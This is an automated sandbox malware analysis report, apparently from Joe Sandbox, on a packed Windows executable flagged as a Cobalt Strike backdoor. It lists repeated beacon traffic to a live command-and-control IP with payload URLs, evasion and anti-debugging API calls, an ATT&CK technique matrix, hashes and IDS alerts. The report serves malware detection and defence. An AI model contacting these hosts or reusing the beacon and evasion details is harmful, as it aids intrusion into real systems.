            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50163
            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50164
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50165
            Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50166
            Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50167
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50168
            Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50169
            Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50170
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50171
            Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50172
            Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50173
            Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50174
            Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50175
            Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50176
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50177
            Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50178
            Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50179
            Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50180
            Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50181
            Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50182
            Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50183
            Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50184
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50186
            Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50187
            Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50188
            Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50189
            Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50190
            Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50191
            Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50192
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50193
            Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50194
            Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50195
            Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50196
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50197
            Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50198
            Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50199
            Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50200
            Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50201
            Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50202
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50203
            Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50204
            Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50205
            Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50206
            Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50207
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50208
            Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50209
            Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50210
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389E0E8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0389E0E8

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_03893FA4 0_2_03893FA4
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_0388F654 0_2_0388F654
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Window / User API: threadDelayed 2012
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Window / User API: threadDelayed 7740
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-32288
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-32372
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe API coverage: 7.4 %
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280 Thread sleep count: 2012 > 30
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280 Thread sleep time: -20120000s >= -30000s
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6304 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280 Thread sleep count: 7740 > 30
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280 Thread sleep time: -77400000s >= -30000s
            Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_0389780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_0389780C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_03890F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_03890F28
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Thread delayed: delay time: 60000
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2360519189.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2494439418.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2851774688.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577565149.00000000007DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe API call chain: ExitProcess graph end node graph_0-32354
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe API call chain: ExitProcess graph end node graph_0-32053

            Anti Debugging

            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Process Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038A69F0 IsDebuggerPresent,__crtUnhandledException, 0_2_038A69F0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038A7604 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_038A7604
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess, 0_2_0040DF90
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038AE314 VirtualQuery,GetModuleFileNameW,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 0_2_038AE314
            Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA, 0_2_00401180
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_00402F69 SetUnhandledExceptionFilter, 0_2_00402F69
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A70
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038A2384 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_038A2384
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038B04F0 SetUnhandledExceptionFilter, 0_2_038B04F0

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_0389BEF0 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0389BEF0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038B0050 AllocateAndInitializeSid, 0_2_038B0050
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle, 0_2_00401630
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00401990
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_03894578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf, 0_2_03894578
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR
            Source: Yara match File source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_03895100 socket,htons,ioctlsocket,closesocket,bind,listen, 0_2_03895100
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_0389CE10 socket,closesocket,htons,bind,listen, 0_2_0389CE10
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_038B0630 bind, 0_2_038B0630
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe Code function: 0_2_03894CF8 htonl,htons,socket,closesocket,bind,ioctlsocket, 0_2_03894CF8
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 2 Valid Accounts | 2 Valid Accounts | 2 Valid Accounts | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 21 Access Token Manipulation | 112 Virtualization/Sandbox Evasion | LSASS Memory | 241 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Process Injection | 21 Access Token Manipulation | Security Account Manager | 112 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 111 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 4 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Source | Detection | Scanner | Label | Link
            k2vUsu5VZ5.exe | 79% | ReversingLabs | Win64.Backdoor.CobaltStrike |
            k2vUsu5VZ5.exe | 100% | Avira | HEUR/AGEN.1345031 |
            k2vUsu5VZ5.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://47.121.190.121:81/r9dN | true | Avira URL Cloud: safe | unknown
            http://47.121.190.121/r9dN | true | Avira URL Cloud: safe | unknown
            http://47.121.190.121:81/dot.gif | true | Avira URL Cloud: safe | unknown
            http://7.121.190.121:81/r9dN | true | Avira URL Cloud: safe | unknown
            • Avira URL Cloud: safe
            unknown
            http://127.0.0.1:%u/k2vUsu5VZ5.exe, 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmpfalse
              high
              http://47.121.190.121:81/dot.gif12k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IP:47.121.190.121
              Domain:unknown
              Country:China
              ASN:37963
              ASN Name:CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
              Malicious:true
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1586891
              Start date and time:2025-01-09 18:26:05 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 52s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:k2vUsu5VZ5.exe
              renamed because original name is a hash value
              Original Sample Name:591c92301d93d233f0ab70817db96afd.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 17
              • Number of non-executed functions: 140
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: k2vUsu5VZ5.exe
              Time:12:26:54
              Type:API Interceptor
              Description:15895420x Sleep call for process: k2vUsu5VZ5.exe modified
              No created / dropped files found
              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):7.482506469989575
              TrID:
              • UPX compressed Win32 Executable (30571/9) 65.57%
              • Win64 Executable (generic) (12005/4) 25.75%
              • Generic Win/DOS Executable (2004/3) 4.30%
              • DOS Executable Generic (2002/1) 4.29%
              • VXD Driver (31/22) 0.07%
              File name:k2vUsu5VZ5.exe
              File size:9'728 bytes
              MD5:591c92301d93d233f0ab70817db96afd
              SHA1:4294d763f3c0a84235627893f1b377632e7a3ef6
              SHA256:18c3b8d894afcee5e215753507d812be492fec2d7bcde4a9b2c461fa60b63464
              SHA512:0b9c19f954f0218faa2452c63d82c7682674e4b38d649b1db4de84f4eebf66d289ecc85f4ca32ccb8ac3654e0c20d3cd147f0c3503250365e2d37783ac899d79
              SSDEEP:192:ZRqd3PcxUjboojUf43iaK5PY7ZPjEo2ppV/VWUQ6iE4GdJ9wqWkS:KbjboojQXQ7B/2ppBVqPUJzS
              TLSH:F1129FDF518548EEC4898434EBFD64985CFF3C580B562F66DED203BFAA282792554420
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./....".0.......... .........@............................................... ............................
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x40df20
              Entrypoint Section:UPX1
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:0x40e14a
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:9aebf3da4677af9275c461261e5abde3
              Name                                  Virtual Address  Virtual Size  Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IMPORT          0xf000           0xd0          UPX2
              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x6000           0x2b8         UPX0
              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_TLS             0xe170           0x28          UPX1
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
              Name  Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
              UPX0  0x1000           0xb000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              UPX1  0xc000           0x3000        0x2200    efdfa9814f4e88093af0979672c2add4  False     0.9702435661764706  data       7.798367281213769  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              UPX2  0xf000           0x1000        0x200     922c9b618a0dc7bae26c062b86d2ed87  False     0.248046875         data       1.575165572176159  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              DLL           Import
              KERNEL32.DLL  LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
              msvcrt.dll    exit
              Timestamp                        SID      Signature                                                       Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
              2025-01-09T18:26:57.140796+0100  2035442  ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1  1         47.121.190.121  81           192.168.2.4     49730      TCP
              2025-01-09T18:26:58.692172+0100  2033713  ET MALWARE Cobalt Strike Beacon Observed                        1         192.168.2.4     49731        47.121.190.121  81         TCP
              2025-01-09T18:30:03.576251+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016147.121.190.12181TCP
              2025-01-09T18:30:04.720300+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016247.121.190.12181TCP
              2025-01-09T18:30:05.842542+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016347.121.190.12181TCP
              2025-01-09T18:30:06.953021+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016447.121.190.12181TCP
              2025-01-09T18:30:08.063446+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016547.121.190.12181TCP
              2025-01-09T18:30:09.223628+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016647.121.190.12181TCP
              2025-01-09T18:30:10.422309+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016747.121.190.12181TCP
              2025-01-09T18:30:11.471504+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016847.121.190.12181TCP
              2025-01-09T18:30:12.603222+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45016947.121.190.12181TCP
              2025-01-09T18:30:13.714908+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017047.121.190.12181TCP
              2025-01-09T18:30:14.883346+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017147.121.190.12181TCP
              2025-01-09T18:30:15.954476+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017247.121.190.12181TCP
              2025-01-09T18:30:17.230496+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017347.121.190.12181TCP
              2025-01-09T18:30:18.516571+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017447.121.190.12181TCP
              2025-01-09T18:30:19.617254+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017547.121.190.12181TCP
              2025-01-09T18:30:20.726961+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017647.121.190.12181TCP
              2025-01-09T18:30:21.817039+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017747.121.190.12181TCP
              2025-01-09T18:30:23.091262+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45017847.121.190.12181TCP
